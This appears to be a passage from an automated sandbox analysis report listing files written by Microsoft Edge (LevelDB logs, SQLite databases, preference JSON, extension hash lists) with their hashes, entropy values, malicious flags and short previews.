                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.181138755589983
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJDeGiB1wkn23oH+Tcwt86FB2KLl5bJDrdFLcM+q2Pwkn23oH+Tcwt865IFUv:7/1fYeb/FFLBdNcM+vYfYeb/WFUv
                                                                                                                                                                                                                                                                                                                  MD5:F963A555D6CC0D5B50660B7CBC8D191E
                                                                                                                                                                                                                                                                                                                  SHA1:9BB66ABBCBD04A8BDDD44043DA425AE4FE1332F2
                                                                                                                                                                                                                                                                                                                  SHA-256:66A4735BB3B5D9BF2BC4AFC3AB78C567095A688B38A402770A0893A4812873E2
                                                                                                                                                                                                                                                                                                                  SHA-512:4455D1F5DAEF337F78163086742222718374BB618C81E40226E19F4DF23B60909542212A0AA70613EA607D276931E4523EDD215562A2A8E42B2192B741CB74E2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.094 168c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2025/01/09-04:59:17.228 168c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1197
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                                                                  MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                                                                                                                                                                  SHA1:B807210A1205126A107A5FE25F070D2879407AA4
                                                                                                                                                                                                                                                                                                                  SHA-256:90685D4E050DA5B6E6F7A42A1EE21264A68F1734FD3BD4A0E044BB53791020A2
                                                                                                                                                                                                                                                                                                                  SHA-512:396FAB9625A2FF396222DBC86A0E2CDE724C83F3130EE099F2872AED2F2F2ECE13B0853D635F589B70BD1B5E586C05A3231D68CAF9E46B6E2DAC105A10D0A1C8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.176341655822036
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJDEYQ+q2Pwkn23oH+Tcwt8NIFUtJbJDEYdWZmwPbJDEYQVkwOwkn23oH+TcN:761+vYfYebpFUtQeW/G1V5JfYebqJ
                                                                                                                                                                                                                                                                                                                  MD5:25E229D8CDBF1BFB86683B8C04253E2C
                                                                                                                                                                                                                                                                                                                  SHA1:802BB0D3F2234BDD0F82978EE71C5839C1E35B09
                                                                                                                                                                                                                                                                                                                  SHA-256:23431F309E9FA500F7CC480E4B6AAD0E30ED9857F121BDF54D7CFECDAB53A2D1
                                                                                                                                                                                                                                                                                                                  SHA-512:D8C8A5A23EF45AD9E458E824D7C8E3701C6081A73C75E559603B881D1610DB9CF125C64DC128FB806910E3476DFA0C1884263A6B0CEB273A56940B71556CA9A6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.452 17cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-04:59:17.452 17cc Recovering log #3.2025/01/09-04:59:17.452 17cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.176341655822036
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJDEYQ+q2Pwkn23oH+Tcwt8NIFUtJbJDEYdWZmwPbJDEYQVkwOwkn23oH+TcN:761+vYfYebpFUtQeW/G1V5JfYebqJ
                                                                                                                                                                                                                                                                                                                  MD5:25E229D8CDBF1BFB86683B8C04253E2C
                                                                                                                                                                                                                                                                                                                  SHA1:802BB0D3F2234BDD0F82978EE71C5839C1E35B09
                                                                                                                                                                                                                                                                                                                  SHA-256:23431F309E9FA500F7CC480E4B6AAD0E30ED9857F121BDF54D7CFECDAB53A2D1
                                                                                                                                                                                                                                                                                                                  SHA-512:D8C8A5A23EF45AD9E458E824D7C8E3701C6081A73C75E559603B881D1610DB9CF125C64DC128FB806910E3476DFA0C1884263A6B0CEB273A56940B71556CA9A6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.452 17cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-04:59:17.452 17cc Recovering log #3.2025/01/09-04:59:17.452 17cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4096
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3169096321222068
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
                                                                                                                                                                                                                                                                                                                  MD5:2554AD7847B0D04963FDAE908DB81074
                                                                                                                                                                                                                                                                                                                  SHA1:F84ABD8D05D7B0DFB693485614ECF5204989B74A
                                                                                                                                                                                                                                                                                                                  SHA-256:F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
                                                                                                                                                                                                                                                                                                                  SHA-512:13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.40981274649195937
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
                                                                                                                                                                                                                                                                                                                  MD5:1A7F642FD4F71A656BE75B26B2D9ED79
                                                                                                                                                                                                                                                                                                                  SHA1:51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
                                                                                                                                                                                                                                                                                                                  SHA-256:B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
                                                                                                                                                                                                                                                                                                                  SHA-512:FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5241404324800358
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                                                                                                                                                                  MD5:241322143A01979D346689D9448AC8C0
                                                                                                                                                                                                                                                                                                                  SHA1:DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
                                                                                                                                                                                                                                                                                                                  SHA-256:65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
                                                                                                                                                                                                                                                                                                                  SHA-512:9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3281731663735024
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:FSA/J3+t76Y4QZZofU99pO0BYASqR4EZY4QZvG/:thHQws9LdDBQZG/
                                                                                                                                                                                                                                                                                                                  MD5:18ABF55A589513CB226B423C85A3A323
                                                                                                                                                                                                                                                                                                                  SHA1:5435052458F67731395DB732E7FC8EE2FC12657A
                                                                                                                                                                                                                                                                                                                  SHA-256:134F8AF1D2617AF679AD191996D417BA4C5772AD6EE4495D41E7B9816B134A1C
                                                                                                                                                                                                                                                                                                                  SHA-512:5535678FBB84E2F0B2DA441C0FC6D258568EB80BE46A17BD28511989EEDF259C682D3A97AD8FE553C465AC1081C402393388CB95E06AEEA01D6F61B27AE12C5B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.............~y....'....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5489453516638294
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:zj9P0FQkQerpP/KbtIcY773pLyhkCgam6IWRKToaAu:zdke2pP/SY7s+FmRKcC
                                                                                                                                                                                                                                                                                                                  MD5:244ABE0A0E6BEBFDCEA61C843247BA99
                                                                                                                                                                                                                                                                                                                  SHA1:77E18B06539876F7344CE29D4C2C4A0590B2E5C4
                                                                                                                                                                                                                                                                                                                  SHA-256:669F6309907B91479537BA88FBC7F1F8DDF0D22B6809A4D0595E48CA8156F22B
                                                                                                                                                                                                                                                                                                                  SHA-512:D102B7B04078C18D5CF2C59E9B3ACE669A8DBD78230F7119F129ACE7C866931B608A79B35B664AE0415E6B1F5C761F7E162CB1F5578EE6B83673A682C5581A17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):403
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.283355265075086
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:7QRV+vYfYeb8rcHEZrELFUtqJ/Y9V5JfYeb8rcHEZrEZSJ:7QkYfYeb8nZrExgqeVJfYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                  MD5:5A45E152EC7AE16A9293E163473C7EBE
                                                                                                                                                                                                                                                                                                                  SHA1:89523298DC93CBB099843808BE49375FD5A7762A
                                                                                                                                                                                                                                                                                                                  SHA-256:7F3AB4A3F75EAFF1CFB23CC80A91205586B8EC75710E83994628F271A0DF21C6
                                                                                                                                                                                                                                                                                                                  SHA-512:C1472537DEE85DC4BB334292A6A428E0E30683016BCE65B0E1B1A74AF29E76AFA687D95F4B4506A71CB610343E4611A71DCE6CC9E8AC31CF13D0819CA3E0FF90
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:18.439 47c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-04:59:18.440 47c Recovering log #3.2025/01/09-04:59:18.440 47c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):403
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.283355265075086
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:7QRV+vYfYeb8rcHEZrELFUtqJ/Y9V5JfYeb8rcHEZrEZSJ:7QkYfYeb8nZrExgqeVJfYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                  MD5:5A45E152EC7AE16A9293E163473C7EBE
                                                                                                                                                                                                                                                                                                                  SHA1:89523298DC93CBB099843808BE49375FD5A7762A
                                                                                                                                                                                                                                                                                                                  SHA-256:7F3AB4A3F75EAFF1CFB23CC80A91205586B8EC75710E83994628F271A0DF21C6
                                                                                                                                                                                                                                                                                                                  SHA-512:C1472537DEE85DC4BB334292A6A428E0E30683016BCE65B0E1B1A74AF29E76AFA687D95F4B4506A71CB610343E4611A71DCE6CC9E8AC31CF13D0819CA3E0FF90
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:18.439 47c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-04:59:18.440 47c Recovering log #3.2025/01/09-04:59:18.440 47c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1600
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.59096081346386
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:PZffWl2/XZueRV03Sx497AHHk2GJ348yls45yG:P93/FBZdP8os+
                                                                                                                                                                                                                                                                                                                  MD5:2851C8F9212ACF6B7500760F9DE4C1C2
                                                                                                                                                                                                                                                                                                                  SHA1:709643CB5509147253FE41B85F1A3AFED40FBC5E
                                                                                                                                                                                                                                                                                                                  SHA-256:2E916C86BEA76175DE0BCBCFB2E100A9627513B7684AD2489BF30C68F8BBECB4
                                                                                                                                                                                                                                                                                                                  SHA-512:AAB5840EA265242701DC4EA8D1B3B84ABD2C8ECFD9543FDD2A66B40416E1A5CED040FDC5D71E184E9B162C5EE6C5340B871B69996BD1B026EB39AC9BA719035B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:....9................VERSION.1..META:https://ntp.msn.com..............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1005}.!_https://ntp.msn.com..LastKnownPV..1736416764223.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736416765777.._https://ntp.msn.com..MUID!.0F21C4DE7A1B6788277DD1B17BB36680.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736416764303,"schedule":[-1,-1,-1,10,-1,29,9],"scheduleFixed":[-1,-1,-1,10,-1,29,9],"simpleSchedule":[13,18,9,25,14,15,42]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736416764159.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250109.199"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.151008409886109
                                                                                                                                                                                                                                                                                                                  Encrypted:false
